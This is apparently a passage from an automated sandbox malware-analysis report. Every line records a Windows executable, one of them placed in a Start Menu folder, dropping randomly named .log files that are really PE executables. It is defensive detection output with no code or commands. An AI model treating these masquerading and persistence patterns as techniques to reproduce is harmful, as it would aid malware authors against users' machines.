                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\QNeKkLxj.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\udNLVcin.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\PoAthZqt.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\pekolobp.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\lfIQBAUr.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\grqSYDFD.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZXnzwSps.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\agYrTKhn.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\vvnfIPHx.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\DqCnHdQh.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\RxFbjhcG.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\vqpwvlrw.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\SdJAbeSN.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\roNndSaI.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\aVcAAtju.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\ApHNCCYS.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeDropped PE file which has not been started: C:\Users\user\Desktop\bOHGhRcS.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\Mdbejyft.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\FIZLHNPh.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZYViKKNQ.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeDropped PE file which has not been started: C:\Users\user\Desktop\HxVaNNSD.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\hzuPnDnj.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\sJafoJXg.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\rAWXeJDJ.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\kbBrEeQW.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\ntFYeaQw.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\ukroqyJE.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\BWJmXZSj.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\NhIjUycT.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\DMSuMAAN.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\XcNSPwyw.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\tdyfcXuf.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeDropped PE file which has not been started: C:\Users\user\Desktop\PUeIrTzt.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\uvTpeyOg.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\nbyFPFWu.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\UsorSwnr.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\OsbzKhHx.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\nOGxuVGL.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\TeKaTmkD.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\cehiCBVH.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\ITPCmwoz.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\qwtgsSmh.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\ulxeAMJt.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\kMzZuVIy.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\PrtbrpVP.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\IJUlMoHw.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\XUBRajkw.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\wfzurMmi.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\vZGvXkKA.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeDropped PE file which has not been started: C:\Users\user\Desktop\DBTJGhcJ.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\NAwlwLuv.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\bIzZYPGT.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\EeGvsrMf.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\jKExtYKb.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\qnXVOghu.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\KGTKXJkx.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeDropped PE file which has not been started: C:\Users\user\Desktop\hyNgaLOK.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\HhaNcSpz.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\UxTRaQvw.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeDropped PE file which has not been started: C:\Users\user\Desktop\SEWrteSu.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\wgyFlLYZ.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\pCKGgjCJ.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeDropped PE file which has not been started: C:\Users\user\Desktop\gtCFacYK.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\gXUhixOD.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\kplGuznc.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\AWpwsIZS.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\SvEAvCEH.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\YvtbMwXu.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\IQFswXwL.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\jIzxpLYw.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\kqZnADfT.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\nxfpBjTr.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\zldVQLHr.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\hfuaKQAB.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\wnjMVvNo.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\RZgJomBm.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\zLWUHZHy.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\OOHuqLql.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\iIfHKufe.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\spJDjPmp.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\gajzKhLA.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\CjKdtCCI.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\yimcMvrd.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\KDDLYXsV.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\TqUKVeNE.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\sPQEsCmi.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\RrULRATN.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\uMuxXkBA.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\eoWApcbj.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\xjEfhhcu.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\kBXYGWDW.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\FJIjaFCP.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\JnnBaKLz.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeDropped PE file which has not been started: C:\Users\user\Desktop\CJDckQCP.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\QtRSZTAM.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\ekfHlLLW.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeDropped PE file which has not been started: C:\Users\user\Desktop\oeuNoEPw.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\mOmHPFNu.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\bVwqfKcL.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZtCSvoKO.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\CwClOmSr.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\XkxktgYB.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\fNFadZoi.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeDropped PE file which has not been started: C:\Users\user\Desktop\BMbUPQnU.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\mdpOgNja.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\MwSuJUdT.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\trTNZned.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\MKncHkNR.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\nxgeHjhA.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\VBwJNHMX.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\SugjFhrA.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\tlovySpD.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZnXAVSVo.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\LGJlUtwq.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\rkdyzPpO.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeDropped PE file which has not been started: C:\Users\user\Desktop\SmnyDbFc.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\LOtDzcWv.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\TnccMNji.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\mQxGLdSr.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\UkEZnNMm.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\qDXyTobI.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\nNYOgdhm.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\YsCiJgGh.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\OnPkEyEo.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\KszcatAz.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\fQyImqSF.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\ASPeVAWX.logJump to dropped file
